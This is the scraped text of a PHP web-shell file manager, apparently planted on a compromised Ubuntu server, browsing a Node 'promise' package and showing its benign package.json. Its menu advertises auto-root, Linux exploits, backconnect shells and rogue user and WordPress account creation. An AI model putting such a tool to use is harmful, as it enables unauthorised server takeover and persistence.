Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
promise /
[ HOME SHELL ]
Name
Size
Permission
Action
domains
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
setimmediate
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
.jshintrc
52
B
-rw-rw-rw-
LICENSE
1.03
KB
-rw-rw-rw-
Readme.md
11.27
KB
-rw-rw-rw-
build.js
2.24
KB
-rw-rw-rw-
core.js
157
B
-rw-rw-rw-
index.d.ts
17.94
KB
-rw-rw-rw-
index.js
49
B
-rw-rw-rw-
index.js.flow
1.69
KB
-rw-rw-rw-
package.json
1.08
KB
-rw-rw-rw-
polyfill-done.js
350
B
-rw-rw-rw-
polyfill.js
231
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "promise", "version": "8.3.0", "description": "Bare bones Promises/A+ implementation", "main": "index.js", "scripts": { "build": "node build", "pretest": "node build", "pretest-resolve": "node build", "pretest-extensions": "node build", "pretest-memory-leak": "node build", "test": "mocha --bail --timeout 200 --slow 99999 -R dot && npm run test-memory-leak", "test-resolve": "mocha test/resolver-tests.js --timeout 200 --slow 999999", "test-extensions": "mocha test/extensions-tests.js --timeout 200 --slow 999999", "test-memory-leak": "node --expose-gc test/memory-leak.js", "coverage": "istanbul cover node_modules/mocha/bin/_mocha -- --bail --timeout 200 --slow 99999 -R dot" }, "repository": { "type": "git", "url": "https://github.com/then/promise.git" }, "author": "ForbesLindesay", "license": "MIT", "devDependencies": { "acorn": "^1.0.1", "better-assert": "*", "istanbul": "^0.3.13", "mocha": "*", "promises-aplus-tests": "*", "rimraf": "^2.3.2" }, "dependencies": { "asap": "~2.0.6" } }
Close